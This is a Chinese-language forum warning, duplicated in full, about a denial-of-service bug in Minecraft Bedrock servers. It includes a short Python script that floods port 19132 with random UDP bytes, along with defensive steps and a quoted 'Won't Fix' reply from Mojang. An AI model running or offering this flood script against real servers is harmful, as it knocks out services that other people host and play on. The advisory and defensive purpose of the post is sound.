MCBE服务器存在致命远程崩服漏洞,请立即采取防护措施!
近期发现一个针对《我的世界》基岩版(MCBE)服务器的严重远程拒绝服务漏洞。该漏洞利用方式极其简单,可导致服务端内存瞬间暴涨并最终崩溃,严重影响服务器稳定性与玩家体验。
受到攻击后,服务端内存会异常飙升,随后程序无响应或直接崩溃。
攻击者只需发送极简的UDP数据包即可对服务端造成破坏。攻击方法已公开流传,任何具备基础网络知识的人都能轻易实施攻击。纯净的官方BDS服务器(基岩版专用服务器)同样受影响。攻击脚本示例(极其简单,仅作警示):
import socket
import random
target_ip = "你的服务器"
target_port = 19132
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
data = bytes([lbk]random.randint(0, 255)[rbk])
sock.sendto(data, (target_ip, target_port))
🛡️ 紧急防护建议:
1. 立即抓包分析(如果你已经被攻击):
在服务器上安装网络分析工具 Wireshark。
开始抓包,设置过滤条件为 udp。
观察并找出向服务器频繁、高速发送UDP数据包的异常IP地址。
通过服务器防火墙或安全组策略,永久封禁这些恶意IP。
2. 加强服务器隐身(降低暴露风险):
在Mojang官方修复此漏洞前,强烈建议不要将服务器的IP地址和端口号公开发布在社交平台、论坛或公开服务器列表上。仅通过私信、QQ群、微信群等半封闭渠道告知核心玩家。
3. 向官方施压(推动问题解决):
该漏洞已通过官方漏洞追踪系统反馈。(MCPE-228407 目前被标记为私密状态)
但令人遗憾的是,Mojang官方目前的态度是"Won't Fix"(不予修复)。官方的解释是:该问题描述了游戏中可能并非预期或理想的行为,但由于修复可能涉及底层代码的大规模改动,且问题严重性评估较低,因此现阶段不打算修复。
这无疑将广大服务器的安危置于不顾!为了我们共同的游戏环境和服务器生存,请各位服主和玩家积极转发此帖,并前往该漏洞链接下留言、投票,向Mojang施加压力,要求其重新评估漏洞风险并尽快给出修复方案!
[lbk]MOD[rbk] Greymagic27
15/Feb/26 12:50 PM (官方回复)
Thank you for your report!
After consideration, the issue is being closed as Won't Fix.
Please note that this is not the same as Working as Intended, as this bug report correctly describes behavior in the game that might not be the intended or desirable behavior, but it will not be fixed right now. Sometimes, this is because the issue reported is minor and/or impossible to change without large architectural changes to the code base.
请大家务必重视,相互转告,共渡难关!
近期发现一个针对《我的世界》基岩版(MCBE)服务器的严重远程拒绝服务漏洞。该漏洞利用方式极其简单,可导致服务端内存瞬间暴涨并最终崩溃,严重影响服务器稳定性与玩家体验。
受到攻击后,服务端内存会异常飙升,随后程序无响应或直接崩溃。
攻击者只需发送极简的UDP数据包即可对服务端造成破坏。攻击方法已公开流传,任何具备基础网络知识的人都能轻易实施攻击。纯净的官方BDS服务器(基岩版专用服务器)同样受影响。攻击脚本示例(极其简单,仅作警示):
import socket
import random
target_ip = "你的服务器"
target_port = 19132
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
data = bytes([lbk]random.randint(0, 255)[rbk])
sock.sendto(data, (target_ip, target_port))
🛡️ 紧急防护建议:
1. 立即抓包分析(如果你已经被攻击):
在服务器上安装网络分析工具 Wireshark。
开始抓包,设置过滤条件为 udp。
观察并找出向服务器频繁、高速发送UDP数据包的异常IP地址。
通过服务器防火墙或安全组策略,永久封禁这些恶意IP。
2. 加强服务器隐身(降低暴露风险):
在Mojang官方修复此漏洞前,强烈建议不要将服务器的IP地址和端口号公开发布在社交平台、论坛或公开服务器列表上。仅通过私信、QQ群、微信群等半封闭渠道告知核心玩家。
3. 向官方施压(推动问题解决):
该漏洞已通过官方漏洞追踪系统反馈。(MCPE-228407 目前被标记为私密状态)
但令人遗憾的是,Mojang官方目前的态度是"Won't Fix"(不予修复)。官方的解释是:该问题描述了游戏中可能并非预期或理想的行为,但由于修复可能涉及底层代码的大规模改动,且问题严重性评估较低,因此现阶段不打算修复。
这无疑将广大服务器的安危置于不顾!为了我们共同的游戏环境和服务器生存,请各位服主和玩家积极转发此帖,并前往该漏洞链接下留言、投票,向Mojang施加压力,要求其重新评估漏洞风险并尽快给出修复方案!
[lbk]MOD[rbk] Greymagic27
15/Feb/26 12:50 PM (官方回复)
Thank you for your report!
After consideration, the issue is being closed as Won't Fix.
Please note that this is not the same as Working as Intended, as this bug report correctly describes behavior in the game that might not be the intended or desirable behavior, but it will not be fixed right now. Sometimes, this is because the issue reported is minor and/or impossible to change without large architectural changes to the code base.
请大家务必重视,相互转告,共渡难关!
